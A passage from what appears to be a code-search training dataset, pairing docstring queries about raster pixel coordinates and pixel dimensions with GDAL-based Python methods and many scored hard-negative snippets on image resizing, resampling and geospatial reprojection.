data_arr.shape[-1]\n\n if data_arr.ndim == 1:\n ret_arr = np.zeros(data_len * 5, dtype=np.float32)\n new_arr_len = fn(self._obj, data_arr, c_int(data_len), ret_arr)\n else:\n data_arr, o_channel_shape = format_channel(data_arr, 1)\n channel_num = data_arr.shape[0]\n\n ret_arr = np.zeros((channel_num, data_len * 5), dtype=np.float32)\n new_arr_len = 0\n for i in range(channel_num):\n _new_arr_len = fn(self._obj, data_arr[i], c_int(data_len), ret_arr[i])\n new_arr_len = max(new_arr_len, _new_arr_len)\n ret_arr = revoke_channel(ret_arr, o_channel_shape, 1)\n\n return ret_arr[..., :new_arr_len]", "def process_image(self, image):\r\n img = cv2.imread(image)\r\n img = img.astype(float)/127 - 1\r\n return np.expand_dims(img, axis=0)", "def FindScale(self):\n\n ## 6 and from the cv code the distance is 6 then we are good\n print(\"TODO: Very hard\")", "def getUnscaledSamples(self, **kwargs) -> TimeData:\n # initialise chans, startSample and endSample with the whole dataset\n options = self.parseGetDataKeywords(kwargs)\n\n # get the files to read and the samples to take from them, in the correct order\n dataFilesToRead, samplesToRead, scalings = self.getDataFilesForSamples(\n options[\"startSample\"], options[\"endSample\"]\n )\n numSamples = options[\"endSample\"] - options[\"startSample\"] + 1\n # set up the dictionary to hold the data\n data = {}\n for chan in options[\"chans\"]:\n data[chan] = np.zeros(shape=(numSamples), dtype=self.dtype)\n\n # loop through chans and get data\n sampleCounter = 0\n for dFile, sToRead, scalar in zip(dataFilesToRead, samplesToRead, scalings):\n # get samples - this is inclusive\n dSamples = sToRead[1] - sToRead[0] + 1\n # spam files always record 5 channels\n dSamplesRead = dSamples * self.recChannels[dFile]\n # read the data\n byteOff = (\n self.dataByteOffset[dFile]\n + sToRead[0] * self.recChannels[dFile] * self.dataByteSize\n )\n dFilePath = os.path.join(self.dataPath, dFile)\n dataRead = np.memmap(\n dFilePath,\n dtype=self.dtype,\n mode=\"r\",\n offset=byteOff,\n shape=(dSamplesRead),\n )\n # now need to unpack this\n for chan in options[\"chans\"]:\n # check to make sure channel exists\n self.checkChan(chan)\n # get the channel index - the chanIndex should give the right order in the data file\n # as it is the same order as in the header file\n chanIndex = self.chanMap[chan]\n # use the range sampleCounter -> sampleCounter + dSamples, because this actually means sampleCounter + dSamples - 1 as python ranges are not inclusive of the end value\n # scale by the lsb scalar here - note that these can be different for each file in the run\n data[chan][sampleCounter : sampleCounter + dSamples] = (\n dataRead[chanIndex : dSamplesRead : self.recChannels[dFile]]\n * scalar[chan]\n )\n # increment sample counter\n sampleCounter = sampleCounter + dSamples # get ready for the next data read\n\n # return data\n startTime, stopTime = self.sample2time(\n options[\"startSample\"], options[\"endSample\"]\n )\n comments = []\n comments.append(\n \"Unscaled data {} to {} read in from measurement {}, samples {} to {}\".format(\n startTime,\n stopTime,\n self.dataPath,\n options[\"startSample\"],\n options[\"endSample\"],\n )\n )\n comments.append(\"Data read from {} files in total\".format(len(dataFilesToRead)))\n comments.append(\n \"Data scaled to mV for all channels using scalings in header files\"\n )\n comments.append(\"Sampling frequency {}\".format(self.getSampleFreq()))\n return TimeData(\n sampleFreq=self.getSampleFreq(),\n startTime=startTime,\n stopTime=stopTime,\n data=data,\n comments=comments,\n )", "def resize(data, data_type, interpolation_method, target_height, target_width):\r\n if target_width == data.shape[1] and target_height == data.shape[0]:\r\n return data\r\n\r\n if data_type == 'stereo':\r\n # disparity map\r\n if interpolation_method == 'bilinear':\r\n result = util_cython.resize(data, target_width, target_height, 0.5)\r\n else:\r\n result = cv2.resize(data, (target_width, target_height), interpolation=cv2.INTER_NEAREST)\r\n else:\r\n # optical flow field\r\n result = np.zeros((target_height, target_width, 2))\r\n if interpolation_method == 'bilinear':\r\n result[:, :, 0] = util_cython.resize(data[:, :, 0], target_width, target_height, 0.5)\r\n result[:, :, 1] = util_cython.resize(data[:, :, 1], target_width, target_height, 0.5)\r\n else:\r\n result = cv2.resize(data, (target_width, target_height), interpolation=cv2.INTER_NEAREST)\r\n return result", "def query_frame(self):\n x, y = N.ogrid[0:self._resolution[1], 0:self._resolution[0]]\n x0, y0 = int(self._resolution[1] / 2), int(self._resolution[0] / 2)\n r = N.hypot(x - x0, y - y0)\n w0 = 75.0\n self.frame = N.array(N.exp(-r ** 2 / w0 ** 2) * 60000, dtype=N.uint16)\n self.frame += N.random.uniform(low=0, high=5535, size=self._resolution[::-1])", "def resample(self, data):\n # Resample signal\n if self._fs_out != self._fs_in:\n\n # Check that new sample rate is compatable with batch size\n if self._next_frame_idx != 0:\n raise ValueError('New sample rate incompatable with batch size.')\n\n # Input dimensions\n frames_in = data.shape[0] # samples\n len_data = float(frames_in) / self._fs_in # seconds\n\n # Output dimensions\n frames_out = int(np.round(len_data*self._fs_out)) # samples\n delta_out = 1.0 / self._fs_out # seconds\n\n # Predict next frame\n self._next_frame_idx = int(np.round(frames_out*delta_out*self._fs_in)) - \\\n frames_in\n\n # Compute indices to output\n idx_out = np.round(np.arange(frames_out)*delta_out*self._fs_in)\n\n # Sample data using output indices\n data_out = np.zeros((frames_out, data.shape[1]))\n for i in range(frames_out):\n idx = min(frames_in - 1, idx_out[i])\n data_out[i, :] = data[int(idx), :]\n\n else:\n\n # No resampling\n data_out = data\n\n return data_out", "def resample(image, flow):\r\n assert flow.shape[1] == 2\r\n b, c, h, w = image.shape\r\n grid = get_grid(b, (h, w))\r\n flow = L.concat([flow[:, 0:1, :, :] / ((w - 1.0) / 2.0),\r\n flow[:, 1:2, :, :] / ((h - 1.0) / 2.0)], 1)\r\n final_grid = L.transpose((grid + flow), (0, 2, 3, 1))\r\n image.stop_gradient = False\r\n try:\r\n output = nn.functional.grid_sample(image, final_grid, mode='bilinear', padding_mode='border', align_corners=True)\r\n except Exception:\r\n output = nn.functional.grid_sample(image, final_grid, mode='bilinear', padding_mode='border')\r\n \r\n return output\r\n # return image\r\n # return L.zeros_like(image)\r" ]
[ "0.5770578", "0.5644546", "0.56255263", "0.55761415", "0.54033136", "0.5392939", "0.536528", "0.5364385", "0.5331956", "0.5313504", "0.5307943", "0.5276826", "0.52704465", "0.52479804", "0.5238506", "0.5231732", "0.52003103", "0.517683", "0.5145478", "0.51325125", "0.51163715", "0.5104453", "0.5092835", "0.50851905", "0.5081938", "0.5079806", "0.50769687", "0.50678796", "0.5065648", "0.5063772", "0.50579244", "0.50506955", "0.50435823", "0.50368625", "0.5019365", "0.5019097", "0.5019097", "0.50190884", "0.50138164", "0.5010639", "0.5004717", "0.50035745", "0.49978384", "0.49829066", "0.49809545", "0.49789864", "0.4972913", "0.49693954", "0.49625567", "0.496158", "0.49612066", "0.49558938", "0.4953811", "0.495172", "0.49499387", "0.4943389", "0.49392447", "0.49276426", "0.49260318", "0.49247807", "0.49199995", "0.49087572", "0.4906858", "0.49059227", "0.4905121", "0.48984513", "0.48974463", "0.48934284", "0.48925644", "0.48902303", "0.488924", "0.48885387", "0.4886625", "0.48864132", "0.48849285", "0.4874222", "0.48653203", "0.48571238", "0.48525682", "0.48515457", "0.48468876", "0.48450205", "0.48409206", "0.48406142", "0.4839113", "0.48377684", "0.48320112", "0.4829218", "0.48279652", "0.48271546", "0.48214445", "0.4820808", "0.48203573", "0.48198593", "0.48190567", "0.48169672", "0.48118308", "0.48097494", "0.4806397", "0.48053595", "0.47959656" ]
0.0
-1
Returns the (width, height) of pixels in this Dataset's units.
def GetPixelDimensions(self): _, width, _, _, _, height = self.GetGeoTransform() return XY(x=width, y=height)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def dimensions (self):\n return (self.width, self.height)", "def get_size(self) -> Tuple2IntType:\n return self.get_width(), self.get_height()", "def size(self):\n return self.width, self.height", "def get_size_inches(self):\n width, height = self.figure.get_size_inches()\n bbox = self.get_position()\n width = width * abs(bbox.width)\n height = height * abs(bbox.height)\n return width, height", "def pixelSize(self):\n br = self.sceneBoundingRect()\n if self.image is None:\n return 1,1\n return br.width()/self.width(), br.height()/self.height()", "def getPixelSize(self):\n return (0.000013, 0.000013)", "def size(self) -> typing.Tuple[int, int]:\n return self.width, self.height", "def getSize(self):\n return self.__width * self.__height;", "def getSize(self):\n return (int(self.getWidth()), int(self.getHeight()))", "def get_pixel_size(self):\n raise NotImplementedError", "def size(self) -> Tuple[int, int]:\n return self._width, self._height", "def size(self) -> Tuple[int, int]:\n return (self.width, self.height)", "def size(self):\n return (self.width, self.height)", "def getDimensions():", "def size(self):\n return (self.width(), self.height())", "def size_in(self):\n return self.dimensions", "def size(self):\n return (self.width)", "def size(self):\n return (self._width, self._height)", "def get_image_size(self, **kwargs):\n points = kwargs['points']\n max_val = points.max(0)\n min_val = points.min(0)\n height = np.ceil((max_val[0] - min_val[0]) * self.res_x).astype(int)\n width = np.ceil((max_val[1] - min_val[1]) * self.res_y).astype(int)\n\n return height, width", "def px_size(self):\n xp, yp = ct.c_float(), ct.c_float()\n\n self.lib.GetPixelSize(ct.pointer(xp), ct.pointer(yp))\n\n return (xp.value, yp.value)", "def getDimensions(self):\n\ttop = self.getTop()\n\tleft = self.getLeft()\n\twidth = self.getWidth()\n\theight = self.getHeight()\n\treturn top, left, width, height", "def _size_pixels(self, renderer):\n return renderer.points_to_pixels(self.size)", "def numPixels(self):\n\t\treturn self.size", "def numPixels(self):\n\t\treturn self.size", "def getDimensions(self):\n return _libsbml.Layout_getDimensions(self)", "def resolution_pixels_xy(self):\n return np.array([self._photo_size_pixels, self._photo_size_pixels])", "def getDims(self):\n size = self.screenSize\n height = int(size.height())\n width = int(size.width())\n return height, width", "def pix_size(self):\n return self._pix_size", "def resolution(self):\n return {'x': self.width, 'y': self.height}", "def get_display_px(self):\n return self.image.size", "def _get_image_dimensions(self):\n\t\timageWidth = int(self.labels['IMAGE']['LINE_SAMPLES'])\n\t\timageHeight = int(self.labels['IMAGE']['LINES'])\n\t\treturn imageWidth, imageHeight", "def get_dim():\n return (Settings.width, Settings.height)", "def size(self):\n return self.width", "def size(self):\n return self.width", "def size(self):\n return self.width", "def size(self):\n return self.width", "def size(self):\n return self.width", "def size(self):\n return self.width", "def size(self):\n return self.width", "def dimension(self) -> float:\n return self._dimensions", "def shape(self) -> tuple[int, int]:\n return self.height, self.width", "def get_data_dimensions(self):\n return image_utils.convert_shape_indexing(self._get_data_dimensions_rc(),\"rc\",self.image_indexing)", "def size_out(self):\n return self.dimensions", "def size(self) -> (float, float):\n\n return self.screen.get_surface().get_size()", "def get_pixel_size(self):\n p0 = core.PointF(0, 0)\n p1 = core.PointF(1, 1)\n tr = self.transform().inverted()[0]\n p01 = tr.map(p0)\n p11 = tr.map(p1)\n return core.PointF(p11 - p01)", "def get_size(self):\n result_str = subprocess.check_output([\n ADB_EXECUTOR, '-s', self.device_id, 'shell',\n 'wm', 'size'\n ]).decode(DEFAULT_CHARSET)\n width, height = result_str.replace('\\n', '').replace('\\r', '').split(' ')[-1].split('x')\n return width, height", "def size(self):\n\n return self.width", "def dimensions(self) -> typing.Tuple[int, int]:\n dimensions = self.data[2]\n dimensions = re.findall(r'(\\d+)\\s+x\\s+(\\d+)\\s+M', dimensions.replace('-', '0'))\n return dimensions[0] if dimensions else (0, 0)", "def get_dimension_width(self):\n pass", "def getDim(self):\n return \"%dx%d\" % (self.rows, self.cols)", "def dimensions():", "def get_data_extent(self):\n x, y = self.xy[0], self.xy[1]\n w, h = self.width, self.height\n return x, y, w, h", "def getDimensions(self):\n return self._majax, self._minax, self._pa", "def dimensions(self) -> int:\n return pulumi.get(self, \"dimensions\")", "def get_dimension_height(self):\n pass", "def canvas_size(self):\r\n width = height = 0\r\n for image in self.images:\r\n x = image.x + image.absolute_width\r\n y = image.y + image.absolute_height\r\n if width < x:\r\n width = x\r\n if height < y:\r\n height = y\r\n return round_up(width), round_up(height)", "def get_detector_size(self):\n sensor=self._get_sensor_info()\n return sensor.nMaxWidth,sensor.nMaxHeight", "def dimension_size(self):\n return self._dim", "def getShape(self):\n if self.initDone:\n return self.pixelHeight,self.pixelWidth\n\n self._waitForInit()\n\n return self.pixelHeight,self.pixelWidth", "def __len__(self):\n return self.width * self.height", "def toPixels(self):\n return (self.tile * AxisDistance.tilesize) + self.pixel", "def area(self):\r\n return self.width * self.height", "def DoGetSize(self):\r\n\r\n return self._rect.width, self._rect.height", "def get_state_size(self) -> Tuple[int, int]:\n return self.height, self.width", "def get_current_resolution(self):\n return self.display_info[\"width\"], self.display_info[\"height\"]", "def get_dimensions(self):\n return self.lon_arr.shape", "def area(self):\n\t\treturn self.width * self.height", "def width(self) -> int:\n return self._image_data.width", "def area(self):\n return self.__width * self.__height", "def area(self):\n return self.__width * self.__height", "def area(self):\n return self.__width * self.__height", "def area(self):\n return self.__width * self.__height", "def area(self):\n return self.__width * self.__height", "def area(self):\n return self.width * self.height", "def area(self):\n return self.width * self.height", "def area(self):\n return self.width * self.height", "def area(self):\n return self.width * self.height", "def area(self):\n return self.width * self.height", "def area(self):\n return self.width * self.height", "def area(self):\n return self.width * self.height", "def area(self):\n return self.width * self.height", "def get_target_dimensions(self):\n if self.target_height is None:\n self._calculate_target_dimensions()\n return int(self.target_width), int(self.target_height)", "def tile_size_2d(self):\n return 32.0, 32.0", "def __len__(self) -> int:\n return self.width * self.height", "def width(self):\n return _libsbml.Dimensions_width(self)", "def area(self):\n return (self.__width * self.__height)", "def area(self):\n return (self.__width * self.__height)", "def width(self):\n return self._get_mean_and_samples_attribute('width')", "def area(self):\n return self.__height * self.__width", "def area(self):\n return self.__height * self.__width", "def area(self):\n return self.__height * self.__width", "def getDimension(data):\r\n # open image for reading in binary mode\r\n\r\n # read the 2 bytes\r\n a = data[163:165]\r\n\r\n # calculate height\r\n height = (a[0] << 8) + a[1]\r\n\r\n # next 2 bytes is width\r\n a = data[165:167]\r\n\r\n # calculate width\r\n width = (a[0] << 8) + a[1]\r\n\r\n return (width, height)", "def area(self):\n return self._width * self._height", "def get_image_size(self):", "def pixelsize(self):\n if hasattr(self, \"_pixelsize\"):\n return self._pixelsize\n\n try:\n return self.header[\"PixSize\"] # [arcsec]\n except KeyError:\n try:\n return abs(self.header[\"CDELT1\"]) * 3600 # [deg] -> [arcsec]\n except KeyError:\n return None", "def _get_dimensions(self):\n corners = []\n for module in self.modules:\n for tile in module:\n corners.append(tile.corners())\n corners = np.concatenate(corners)[:, :2] / self._pixel_shape\n\n # Find extremes, add 1 px margin to allow for rounding errors\n min_xy = corners.min(axis=0).astype(int) - 1\n max_xy = corners.max(axis=0).astype(int) + 1\n\n size = max_xy - min_xy\n centre = -min_xy\n # Switch xy -> yx\n return tuple(size[::-1]), centre[::-1]", "def get_density(self):\n xpx, ypx = self.get_axes_pixelsize()\n\n xmin, xmax = self.axes.get_xlim()\n ymin, ymax = self.axes.get_ylim()\n width = xmax - xmin\n height = ymax - ymin\n\n return width / xpx, height / ypx", "def get_image_shape(self) -> Tuple[int, int]:\n x = self.header.get(\"Rows\")\n y = self.header.get(\"Columns\")\n if x is not None and y is not None:\n return (x // self.size, y // self.size)", "def GetDimensions(filename):\n with Image(filename=filename) as img:\n dimensions = (img.width, img.height)\n return(dimensions)", "def area(self):\n\n return self.__width * self.__height" ]
[ "0.7506064", "0.7479907", "0.7441489", "0.74142814", "0.7389819", "0.7367811", "0.73565596", "0.73126996", "0.72868365", "0.7277576", "0.72565204", "0.7253058", "0.72077274", "0.72069263", "0.71481836", "0.7120468", "0.7104735", "0.70551723", "0.7054781", "0.70520395", "0.7045539", "0.7022868", "0.70155936", "0.70155936", "0.6977367", "0.69575024", "0.6944623", "0.6929413", "0.6910823", "0.6899658", "0.689238", "0.6873743", "0.68591344", "0.68591344", "0.68591344", "0.68591344", "0.68591344", "0.68591344", "0.68591344", "0.6854056", "0.6833276", "0.6830843", "0.6825155", "0.68158436", "0.68019533", "0.6787426", "0.6783572", "0.6743567", "0.67329556", "0.6702341", "0.66861486", "0.66801685", "0.6671783", "0.66553265", "0.66523576", "0.66421914", "0.6629218", "0.66253066", "0.6623292", "0.66197604", "0.6608857", "0.66083455", "0.65971553", "0.659455", "0.6589303", "0.6587672", "0.65810436", "0.658047", "0.6580235", "0.6580235", "0.6580235", "0.6580235", "0.6580235", "0.6573088", "0.6573088", "0.6573088", "0.6573088", "0.6573088", "0.6573088", "0.6573088", "0.6573088", "0.6571182", "0.65707433", "0.6566482", "0.6558894", "0.65566564", "0.65566564", "0.65477437", "0.65453875", "0.65453875", "0.65453875", "0.65435326", "0.65427756", "0.6540359", "0.6537701", "0.6531522", "0.6530893", "0.6529505", "0.65264636", "0.652547" ]
0.77364904
0
Transforms pixel coordinates into the destination projection. If transform is None, no reprojection occurs and the dataset's SpatialReference is used.
def PixelCoordinates(self, x, y, transform=None): # Assert that pixel_x and pixel_y are valid if not 0 <= x <= self.RasterXSize: raise ValueError('x %r is not between 0 and %d' % (x, self.RasterXSize)) if not 0 <= y <= self.RasterYSize: raise ValueError('y %r is not between 0 and %d' % (y, self.RasterYSize)) geotransform = self.GetGeoTransform() coords = XY( geotransform[0] + geotransform[1] * x + geotransform[2] * y, geotransform[3] + geotransform[4] * x + geotransform[5] * y ) if transform is None: return coords # Reproject return XY(*transform.TransformPoint(coords.x, coords.y)[0:2])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _reproject(ds, dst_crs=None, dst_transform=None, width=None, height=None,\n res=None, extent=None, **kwargs):\n\n if 'resampling' not in kwargs:\n kwargs['resampling'] = rasterio.warp.Resampling.cubic\n\n src_crs = get_crs(ds)\n src_bounds = get_bounds(ds)\n if extent is not None:\n extent = BoundingBox(*extent)\n\n #\n # Only allow inferring of width or height from aspect ratio\n # if the CRS is not changed.\n #\n if dst_crs is None:\n dst_crs = src_crs\n if width is None and height is not None:\n width = int(ncols(ds) * height / nrows(ds))\n elif height is None and width is not None:\n height = int(nrows(ds) * width / ncols(ds))\n\n # Given: transform, shape\n # Given: transform, extent\n # Given: res, extent\n # Given: shape, res\n # Given: shape, extent\n\n if dst_transform is not None:\n #\n # If the transform is given, we also need the width and height or\n # the extent.\n #\n if width is not None and height is not None:\n pass\n elif extent is not None:\n # Calculate width and height from extent\n width = int(abs(\n (extent.right - extent.left) / dst_transform.a)) + 1\n height = int(abs(\n (extent.top - extent.bottom) / dst_transform.e)) + 1\n else:\n raise ValueError('Not enough information provided.')\n\n elif extent is not None:\n #\n # Transform can be calculated from extent, if either width and height\n # or the resolution are given.\n #\n if res is not None:\n width = int(abs(\n (extent.right - extent.left) / res[0])) + 1\n height = int(abs(\n (extent.top - extent.bottom) / res[1])) + 1\n\n # The following doesn't give the correct result.\n dst_transform = rasterio.transform.from_bounds(\n *extent, width=width-1, height=height-1\n )\n\n else:\n #\n # If neither the transform nor the extent are given, infer the best\n # possible parameters from the width, height, and the resolution.\n #\n dst_transform, width, height = \\\n rasterio.warp.calculate_default_transform(\n src_crs, dst_crs,\n ncols(ds), nrows(ds),\n resolution=res,\n dst_width=width,\n dst_height=height,\n **src_bounds._asdict())\n\n src_transform = get_transform(ds)\n src_dims = get_dims(ds)\n dst_crs = _parse_crs(dst_crs)\n\n #\n # Prepare new x and y coordinate arrays\n #\n dst_x, _ = dst_transform * (np.arange(width), np.zeros(width, dtype=int))\n _, dst_y = dst_transform * (np.zeros(height, dtype=int), np.arange(height))\n dst_coords = {'x': dst_x, 'y': dst_y}\n\n #\n # Handle the case where there are extra dimensions, e.g. 'time'\n # or 'band'\n #\n extra_dims = src_dims.keys() - {'y', 'x'}\n if len(extra_dims) == 0:\n dst_shape = (height, width)\n dst_dims = ('y', 'x')\n elif len(extra_dims) == 1:\n extra_dim = extra_dims.pop()\n dst_shape = (src_dims[extra_dim], height, width)\n dst_dims = (extra_dim, 'y', 'x')\n dst_coords[extra_dim] = ds.coords[extra_dim]\n else:\n raise ValueError('More than three dimensions are not supported.')\n\n def _reproject_da(da, shape):\n #\n # Reproject a single data array\n #\n extra_dims = set(da.dims) - {'y', 'x'}\n dim_order = tuple(extra_dims) + ('y', 'x')\n values = da.transpose(*dim_order).values\n output = np.zeros(shape, dtype=da.dtype)\n output[:] = np.nan\n\n # Fix data shape for one-dimensional data\n if da.ndim == 1:\n #\n # NOTE: The stretch factor is necessary because the input data\n # must extend at least half an original resolution cell in the\n # independent dimension.\n #\n if da.dims == ('x',):\n stretch_x = int((~src_transform * dst_transform).a / 2 + 1)\n values = np.vstack([values] * stretch_x)\n output.shape = (1,) + output.shape\n elif da.dims == ('y',):\n stretch_y = int((~src_transform * dst_transform).e / 2 + 1)\n values = np.vstack([values] * stretch_y).T\n output.shape = output.shape + (1,)\n\n rasterio.warp.reproject(\n values,\n output,\n src_transform=src_transform,\n src_crs=src_crs,\n dst_transform=dst_transform,\n dst_crs=dst_crs,\n dst_nodata=np.nan,\n **kwargs\n )\n\n # Final reshape in case the input was one-dimensional\n return output.reshape(shape)\n\n if isinstance(ds, xr.Dataset):\n result = xr.Dataset(coords=dst_coords)\n\n #\n # Also reproject coordinate arrays that are defined over\n # x and y\n #\n for v in ds.coords:\n #\n # If the projection is the same, also reproject coordinate arrays\n # that are defined over only one variable.\n #\n if dst_crs == src_crs and v not in ds.dims:\n if ds.coords[v].dims == ('x',):\n result.coords[v] = \\\n (('x',), _reproject_da(ds.coords[v], (width,)))\n elif ds.coords[v].dims == ('y',):\n result.coords[v] = \\\n (('y',), _reproject_da(ds.coords[v], (height,)))\n\n if not set(ds.coords[v].dims).issuperset({'x', 'y'}):\n continue\n\n shape = (height, width)\n result.coords[v] = (('y', 'x'),\n _reproject_da(ds.coords[v], shape))\n\n #\n # Reproject the actual data\n #\n for v in ds.data_vars:\n if set(ds[v].dims) == set(dst_dims):\n result[v] = (dst_dims, _reproject_da(ds[v], dst_shape))\n elif set(ds[v].dims) == {'y', 'x'}:\n shape = (height, width)\n result[v] = (dst_dims, _reproject_da(ds[v], shape))\n else:\n result[v] = (ds[v].dims, ds[v])\n\n #\n # Create lat and lon coordinates\n #\n # if 'lat' in ds.coords and 'lon' in ds.coords:\n # lon, lat = rasterio.warp.transform(\n # src_crs, dst_crs, ds.coords['x'], ds.coords['y'])\n # result.coords['lon'] = (('x',), lon)\n # result.coords['lat'] = (('y',), lat)\n\n elif isinstance(ds, xr.DataArray):\n result = xr.DataArray(_reproject_da(ds, dst_shape), dims=dst_dims,\n coords=dst_coords, name=ds.name)\n\n result.attrs = ds.attrs\n\n # Serialize transform to tuple and store in metadata\n result.attrs['transform'] = dst_transform[:6]\n # Store CRS info in metadata\n result.attrs['crs'] = dst_crs.to_string()\n result.attrs['coordinate_system_string'] = dst_crs.wkt\n # Store new data shape in metadata\n result.attrs['lines'] = nrows(result)\n result.attrs['samples'] = ncols(result)\n\n _add_latlon(result)\n\n return result", "def reproject(self, lon, lat):\n if self.xform is None:\n # if the CRS hasn't been determined yet, we set it from the first image's lat/lon (take the UTM crs)\n utm_i = str(int(math.floor((self.images[0].lon + 180) / 6 ) % 60) + 1).zfill(2)\n epsg_code = int('326' + utm_i) if (self.images[0].lat >= 0) else int('327' + utm_i)\n self.crs_dest = QgsCoordinateReferenceSystem(epsg_code)\n self.xform = QgsCoordinateTransform(self.crs_src, self.crs_dest, QgsProject.instance())\n return self.xform.transform(QgsPointXY(lon, lat))", "def apply(self, ds):\n\n return _reproject(ds, dst_crs=self.crs, dst_transform=self.transform,\n width=self.width, height=self.height, res=self.res,\n extent=self.extent, **self.kwargs)", "def reproject(\n self,\n dst_crs=None,\n dst_res=None,\n dst_transform=None,\n dst_width=None,\n dst_height=None,\n dst_nodata=None,\n method=\"nearest\",\n align=False,\n ):\n\n def _reproj(da, **kwargs):\n return da.raster._reproject(**kwargs)\n\n # parse and check destination grid and crs\n dst_crs = self._dst_crs(dst_crs)\n dst_transform, dst_width, dst_height = self._dst_transform(\n dst_crs, dst_res, dst_transform, dst_width, dst_height, align\n )\n reproj_kwargs = dict(\n dst_crs=dst_crs,\n dst_transform=dst_transform,\n dst_width=dst_width,\n dst_height=dst_height,\n )\n # gdal resampling method with exception for index based resampling\n method = method.lower()\n if method == \"nearest_index\":\n index = self.nearest_index(**reproj_kwargs)\n return self.reindex2d(index, dst_nodata)\n # update reproject settings\n if dst_nodata is None:\n dst_nodata = self.nodata if self.nodata is not None else np.nan\n reproj_kwargs.update(method=method, dst_nodata=dst_nodata)\n if self._obj.chunks is None:\n da_reproj = _reproj(self._obj, **reproj_kwargs)\n else:\n # create template with dask data\n dst_coords = {\n d: self._obj.coords[d]\n for d in self._obj.dims\n if d not in [self.x_dim, self.y_dim]\n }\n coords = gis_utils.affine_to_coords(\n dst_transform,\n (dst_height, dst_width),\n x_dim=self.x_dim,\n y_dim=self.y_dim,\n )\n dst_coords.update(coords)\n da_temp = full(\n dst_coords,\n nodata=dst_nodata,\n dtype=self._obj.dtype,\n name=self._obj.name,\n attrs=self._obj.attrs,\n crs=dst_crs,\n lazy=True,\n shape=(dst_height, dst_width)\n if self.dim0 is None\n else (self._obj.shape[0], dst_height, dst_width),\n dims=self.dims if self.dim0 is None else (self.dim0, *self.dims),\n )\n # no chunks on spatial dims\n chunksize = max(self._obj.chunks[0])\n chunks = {d: chunksize if d == self.dim0 else -1 for d in self._obj.dims}\n _da = self._obj.chunk(chunks)\n da_temp = da_temp.chunk(chunks)\n da_reproj = _da.map_blocks(_reproj, kwargs=reproj_kwargs, template=da_temp)\n da_reproj.raster.set_crs(dst_crs)\n return da_reproj.raster.reset_spatial_dims_attrs()", "def geotransform(self):\n return self.dataset.GetGeoTransform() if self.dataset else None", "def reproject(self, spatial_reference, transformation=None, inplace=False):\r\n if HASARCPY:\r\n if isinstance(spatial_reference, arcpy.SpatialReference):\r\n wkt = spatial_reference.exportToString()\r\n wkid = spatial_reference.factoryCode\r\n if wkid:\r\n sr = _types.SpatialReference({'wkid' : wkid})\r\n elif wkt:\r\n sr = _types.SpatialReference({'wkt': wkt})\r\n else:\r\n sr = None\r\n elif isinstance(spatial_reference, int):\r\n sr = _types.SpatialReference({'wkid' : spatial_reference})\r\n elif isinstance(spatial_reference, string_types):\r\n sr = _types.SpatialReference({'wkt' : spatial_reference})\r\n elif isinstance(spatial_reference, _types.SpatialReference):\r\n sr = spatial_reference\r\n else:\r\n raise ValueError(\"spatial_referernce must be of type: int, string, _types.SpatialReference, or arcpy.SpatialReference\")\r\n\r\n if inplace:\r\n df = self\r\n else:\r\n df = self.copy()\r\n sarcpy = sr.as_arcpy\r\n if sarcpy:\r\n geom = df.geometry.project_as(sarcpy, transformation)\r\n geom.sr = sr\r\n df.geometry = geom\r\n if inplace:\r\n return df\r\n else:\r\n raise Exception(\"could not reproject the dataframe.\")\r\n return df", "def reproject(dataset, epsg):\n dataclass = dataset.__class__.__name__\n # Run appropriate reprojection method\n if dataclass == 'GeoDataFrame':\n repro = geopandas.GeoDataFrame.copy(dataclass)\n repro[repro.geometry.name] = repro.geometry.to_crs(epsg=epsg)\n repro.crs = fiona.crs.from_epsg(epsg)\n elif dataclass == 'Dataset':\n repro = gdal_reproject(dataset, '', epsg=epsg)\n return repro", "def reproject_dataset_example(dataset, dataset_example, method=1):\n # open dataset that must be transformed\n try:\n if (os.path.splitext(dataset)[-1] == '.tif' or os.path.splitext(dataset)[-1] == '.TIF'):\n g = gdal.Open(dataset)\n else:\n g = dataset\n except:\n g = dataset\n epsg_from = Get_epsg(g)\n\n #exceptions\n if epsg_from == 9001:\n epsg_from = 5070\n\n # open dataset that is used for transforming the dataset\n try:\n if (os.path.splitext(dataset_example)[-1] == '.tif' or os.path.splitext(dataset_example)[-1] == '.TIF'):\n gland = gdal.Open(dataset_example)\n epsg_to = Get_epsg(gland)\n else:\n gland = dataset_example\n epsg_to = Get_epsg(gland)\n except:\n gland = dataset_example\n epsg_to = Get_epsg(gland)\n\n # Set the EPSG codes\n osng = osr.SpatialReference()\n osng.ImportFromEPSG(epsg_to)\n wgs84 = osr.SpatialReference()\n wgs84.ImportFromEPSG(epsg_from)\n\n # Get shape and geo transform from example\n geo_land = gland.GetGeoTransform()\n col=gland.RasterXSize\n rows=gland.RasterYSize\n\n # Create new raster\n mem_drv = gdal.GetDriverByName('MEM')\n dest1 = mem_drv.Create('', col, rows, 1, gdal.GDT_Float32)\n dest1.SetGeoTransform(geo_land)\n dest1.SetProjection(osng.ExportToWkt())\n\n # Perform the projection/resampling\n if method == 1:\n gdal.ReprojectImage(g, dest1, wgs84.ExportToWkt(), osng.ExportToWkt(), gdal.GRA_NearestNeighbour)\n if method == 2:\n gdal.ReprojectImage(g, dest1, wgs84.ExportToWkt(), osng.ExportToWkt(), gdal.GRA_Bilinear)\n if method == 3:\n gdal.ReprojectImage(g, dest1, wgs84.ExportToWkt(), osng.ExportToWkt(), gdal.GRA_Lanczos)\n if method == 4:\n gdal.ReprojectImage(g, dest1, wgs84.ExportToWkt(), osng.ExportToWkt(), gdal.GRA_Average)\n \n return(dest1)", "def imageTransform(self):\n ims = self.imageShape\n acs = self.activeShape\n dx = self.colVector\n dy = self.rowVector\n\n p0 = self.activeOrigin\n p1 = p0 + acs[2] * dx\n p2 = p0 + acs[1] * dy\n\n # print p0, p1, p2\n # print acs, dx, dy\n\n localPts = list(map(pg.Vector, [[0,0], [ims[2],0], [0,ims[1]], [0,0,1]])) # w and h of data of image in pixels.\n globalPts = list(map(pg.Vector, [p0, p1, p2, [0,0,1]]))\n m = pg.solve3DTransform(localPts, globalPts)\n m[:,2] = m[:,3]\n m[2] = m[3]\n m[2,2] = 1\n tr = Qt.QTransform(*m[:3,:3].transpose().reshape(9))\n return tr", "def geo_transform(self):\n pass", "def TransformPoint(*args, **kwargs):\n return _gdi_.GraphicsMatrix_TransformPoint(*args, **kwargs)", "def _getGeoTransform(self):\n with self._getDatasetLock:\n gt = 